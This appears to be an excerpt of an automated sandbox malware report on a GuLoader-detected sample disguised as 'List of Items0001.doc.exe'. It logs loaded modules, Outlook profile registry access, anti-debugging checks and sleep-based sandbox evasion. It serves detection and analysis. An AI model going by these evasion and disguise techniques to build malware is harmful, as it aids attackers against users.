        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wdscore.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: List of Items0001.doc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: TapiUnattend.pdbGCTL source: List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674209883406.0000000002334000.00000004.00000020.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678883923554.00000000010B8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MzAJhEkohQv.exe, 00000004.00000000.674131095770.0000000000CFE000.00000002.00000001.01000000.00000009.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678885977938.0000000000CFE000.00000002.00000001.01000000.00000009.sdmp
        Source: Binary string: wntdll.pdbUGP source: List of Items0001.doc.exe, 00000003.00000003.674118248862.000000003248A000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674114276384.00000000322E0000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674206681805.00000000035C3000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003A5D000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674210473415.000000000377C000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003930000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: List of Items0001.doc.exe, List of Items0001.doc.exe, 00000003.00000003.674118248862.000000003248A000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674114276384.00000000322E0000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674206681805.00000000035C3000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003A5D000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674210473415.000000000377C000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003930000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: TapiUnattend.pdb source: List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674209883406.0000000002334000.00000004.00000020.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678883923554.00000000010B8000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000003.00000002.674206863103.0000000001768000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.674050583045.0000000004F78000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_6DB61BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6DB61BFF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_6DB630C0 push eax; ret 0_2_6DB630EE
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326321AD pushad ; retf 0004h3_2_3263223F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326397A1 push es; iretd 3_2_326397A8
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326608CD push ecx; mov dword ptr [esp], ecx3_2_326608D6
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_0393D3A2 push ebx; retf 4_2_0393D3A3
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_03940A04 push FFFFFFA4h; retf 4_2_03940A07
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_0394D22F push 0000002Bh; iretd 4_2_0394D38A
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_039398A4 push cs; ret 4_2_039398A6
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_039396F2 push edx; retf 4_2_039396F7
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_0393F673 push esp; iretd 4_2_0393F674
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_039425C2 push esp; retf 4_2_0394262B
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_0393F5EF push edi; ret 4_2_0393F5F8
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dllJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Uses an obfuscated file name to hide its real file extension (double extension)
        Source: Possible double extension: doc.exeStatic PE information: List of Items0001.doc.exe
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeAPI/Special instruction interceptor: Address: 5715348
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeAPI/Special instruction interceptor: Address: 1F05348
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAD144
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAD604
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAD764
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAD324
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAD364
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAD004
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAFF74
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAD864
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 rdtsc 3_2_326A1763
        Source: C:\Windows\SysWOW64\TapiUnattend.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 875Jump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 5340Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 5340Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 5340Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 5340Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe TID: 1916Thread sleep count: 49 > 30Jump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe TID: 1916Thread sleep time: -245000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe TID: 1916Thread sleep count: 57 > 30Jump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe TID: 1916Thread sleep time: -85500s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe TID: 1916Thread sleep count: 71 > 30Jump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe TID: 1916Thread sleep time: -71000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\TapiUnattend.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
        Source: explorer.exe, 00000009.00000002.678908041013.000000000C2AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C2AB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
        Source: List of Items0001.doc.exe, 00000003.00000003.674115003172.0000000002334000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674115450452.0000000002334000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674209883406.0000000002334000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C8A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C8A7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: MzAJhEkohQv.exe, 00000006.00000002.678883194539.000000000044F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
        Source: List of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: TapiUnattend.exe, 00000005.00000002.677674890216.0000000003294000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.674508200436.000001F76DC6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeAPI call chain: ExitProcess graph end nodegraph_0-4285
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeAPI call chain: ExitProcess graph end nodegraph_0-4505
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 rdtsc 3_2_326A1763
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A34E0 NtCreateMutant,LdrInitializeThunk,3_2_326A34E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_6DB61BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6DB61BFF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271D270 mov eax, dword ptr fs:[00000030h]3_2_3271D270
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F327E mov eax, dword ptr fs:[00000030h]3_2_326F327E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F327E mov eax, dword ptr fs:[00000030h]3_2_326F327E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F327E mov eax, dword ptr fs:[00000030h]3_2_326F327E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F327E mov eax, dword ptr fs:[00000030h]3_2_326F327E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F327E mov eax, dword ptr fs:[00000030h]3_2_326F327E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F327E mov eax, dword ptr fs:[00000030h]3_2_326F327E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B273 mov eax, dword ptr fs:[00000030h]3_2_3265B273
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B273 mov eax, dword ptr fs:[00000030h]3_2_3265B273
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B273 mov eax, dword ptr fs:[00000030h]3_2_3265B273
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268F24A mov eax, dword ptr fs:[00000030h]3_2_3268F24A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F247 mov eax, dword ptr fs:[00000030h]3_2_3271F247
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272124C mov eax, dword ptr fs:[00000030h]3_2_3272124C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272124C mov eax, dword ptr fs:[00000030h]3_2_3272124C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272124C mov eax, dword ptr fs:[00000030h]3_2_3272124C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272124C mov eax, dword ptr fs:[00000030h]3_2_3272124C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269A22B mov eax, dword ptr fs:[00000030h]3_2_3269A22B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269A22B mov eax, dword ptr fs:[00000030h]3_2_3269A22B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269A22B mov eax, dword ptr fs:[00000030h]3_2_3269A22B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E0227 mov eax, dword ptr fs:[00000030h]3_2_326E0227
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E0227 mov eax, dword ptr fs:[00000030h]3_2_326E0227
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E0227 mov eax, dword ptr fs:[00000030h]3_2_326E0227
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32680230 mov ecx, dword ptr fs:[00000030h]3_2_32680230
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265A200 mov eax, dword ptr fs:[00000030h]3_2_3265A200
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EB214 mov eax, dword ptr fs:[00000030h]3_2_326EB214
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EB214 mov eax, dword ptr fs:[00000030h]3_2_326EB214
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265821B mov eax, dword ptr fs:[00000030h]3_2_3265821B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326572E0 mov eax, dword ptr fs:[00000030h]3_2_326572E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266A2E0 mov eax, dword ptr fs:[00000030h]3_2_3266A2E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266A2E0 mov eax, dword ptr fs:[00000030h]3_2_3266A2E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266A2E0 mov eax, dword ptr fs:[00000030h]3_2_3266A2E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266A2E0 mov eax, dword ptr fs:[00000030h]3_2_3266A2E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266A2E0 mov eax, dword ptr fs:[00000030h]3_2_3266A2E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266A2E0 mov eax, dword ptr fs:[00000030h]3_2_3266A2E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326682E0 mov eax, dword ptr fs:[00000030h]3_2_326682E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326682E0 mov eax, dword ptr fs:[00000030h]3_2_326682E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326682E0 mov eax, dword ptr fs:[00000030h]3_2_326682E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326682E0 mov eax, dword ptr fs:[00000030h]3_2_326682E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265D2EC mov eax, dword ptr fs:[00000030h]3_2_3265D2EC
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265D2EC mov eax, dword ptr fs:[00000030h]3_2_3265D2EC
